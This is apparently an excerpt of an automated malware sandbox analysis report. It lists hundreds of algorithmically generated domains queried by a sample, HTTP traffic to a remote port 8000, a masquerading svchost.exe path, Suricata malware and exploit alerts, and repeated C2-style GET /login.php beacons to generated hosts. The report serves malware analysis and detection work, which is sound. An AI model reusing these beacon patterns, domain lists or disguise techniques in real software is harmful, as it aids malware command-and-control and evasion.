Source: unknownDNS traffic detected: query: vojymic.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumypog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyryc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzybep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyzas.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyhyl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyjut.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufydep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyhyw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysytyr.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxyfar.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufypiq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyrev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacynuz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykytej.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowycac.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purypol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxyjun.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganykaz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojyrak.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryjir.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvytuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyjic.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyqiv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyvis.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujypup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegykiq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykygur.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyduh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyhuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganypih.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyrag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowypit.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyqub.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyryw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyqyl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryled.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqynyw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puryjil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxyjaj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupywog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyfah.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyhev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocydof.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonygec.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetytav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purygeg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqytal.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyqys.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekysip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykymyr.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebynyg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojyjyc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexynol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujygul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzytap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyfob.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqytup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufywil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatycyb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqycos.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxyxyd.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowygem.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqypew.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyhil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyfow.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegysyg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegylep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyvep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahynaz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexykaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyfir.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacycus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumycug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyxyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyriz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galycuw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofymem.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrymuj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyfav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxywer.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyxyj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykysix.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojycif.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymyjon.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyxug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocypyt.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyqil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvygyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvydov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujyteq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymyfoj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopydum.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyros.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvytuj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekykev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujymel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyfog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvybeg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupyjuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujydag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyxip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonybat.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopymyc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopygat.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojybek.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyrys.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyvar.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexytep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufydul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyviw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysynur.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyquz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzylol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojyquf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puryxag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymytux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetykol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocygyk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysynaj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedytul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqykus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujywiv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyrov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumyxiv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopyqim.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufycol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymyner.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryxen.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyqaf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumylel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyzuz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufytev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumytol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volykyc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyrac.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupybul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyfaz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyxux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyzez.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupyxup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymywaj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrynad.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyruk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykyxur.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyroh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetysal.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyhys.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyhuh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzyciq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyrym.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purypyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyzaw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysylej.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofypuk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galykiz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujyjup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacynow.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyqis.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqynel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymysud.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puryxuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyzeb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxywij.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purybav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufymoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volygyf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqycyz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumyxep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqylyl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyvop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzywel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyvav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupylaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyteg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumypyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzymig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujyjav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvytan.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyfyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvymir.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galydoz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymylij.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyqob.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygysij.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupyboq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyfad.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowypek.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyjox.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymyxex.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyfew.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujycov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purymuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purylup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofyjuk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetynev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxygud.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetysuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygysen.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purytov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrywax.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopydek.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqysuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykyjad.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyged.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyfil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyraw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyjuj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygymoj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygymyn.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryfox.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqypiz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvywup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganynyb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyguj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galykes.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojypuc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocykif.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvytag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyqyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopycyf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvywav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufyxug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedykiv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojyzyt.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygylax.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyger.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexylal.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekylag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufypeg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvynen.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvywux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyqug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyvix.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyfex.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzydal.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyfes.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyjid.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofyzym.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyqop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvysur.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadydas.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvyxeq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyfin.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volycik.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxylux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojydam.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufybop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyrot.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzywuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrysyj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyxiq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygytyd.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyvig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopybok.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyleq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volybec.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetylip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocybam.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumydoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyvoz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyfyz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyjok.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqydus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyreh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyxyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyloq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymysan.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyxeg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofydut.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyxun.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojymet.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofybic.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahydoh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryvur.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufylap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyfeg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadykos.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvylyg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekytyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyzub.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvypul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykyfen.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvycip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumygyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxytex.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofyref.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebykap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqydeb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxysun.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyryl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegynuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purylev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykylan.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyzac.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymygyx.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyzam.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopypec.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyquc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekynuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyrez.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopypif.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyket.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufygav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganypeb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzymev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyvew.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujylog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxyvoj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatypub.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygygin.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatykow.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyreq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykywid.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyjym.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygynox.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedynul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebylug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopyzuc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyqoc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowycut.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexynyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocykem.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojygut.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyqup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyheh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujybyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxymin.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzyguv.com replaycode: Name error (3)
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 8000
Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 8000
Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 8000
Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 8000
Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 53550 -> 8000
Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 53550
Source: unknownNetwork traffic detected: HTTP traffic on port 53553 -> 8000
Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 53553
Source: unknownNetwork traffic detected: DNS query count 1002
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C83D90 IsNetworkAlive,IsUserAnAdmin,DnsFlushResolverCache,memset,lstrcpynA,lstrcpynA,StrNCatA,StrNCatA,InternetCheckConnectionA,InternetCheckConnectionA,memset,lstrcpynA,StrNCatA,InternetCheckConnectionA,2_2_02C83D90
Source: global trafficTCP traffic: 192.168.2.8:49728 -> 106.15.232.163:8000
Source: global trafficDNS traffic detected: number of DNS queries: 1002
Source: Joe Sandbox ViewIP Address: 3.94.10.34 3.94.10.34
Source: Joe Sandbox ViewIP Address: 64.190.63.136 64.190.63.136
Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.8:49715
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.8:49715
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.8:49712
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.8:49712
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.8:49724
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.8:49724
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.34.198.229:80 -> 192.168.2.8:53598
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.34.198.229:80 -> 192.168.2.8:53598
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.8:49738
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.8:62057
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
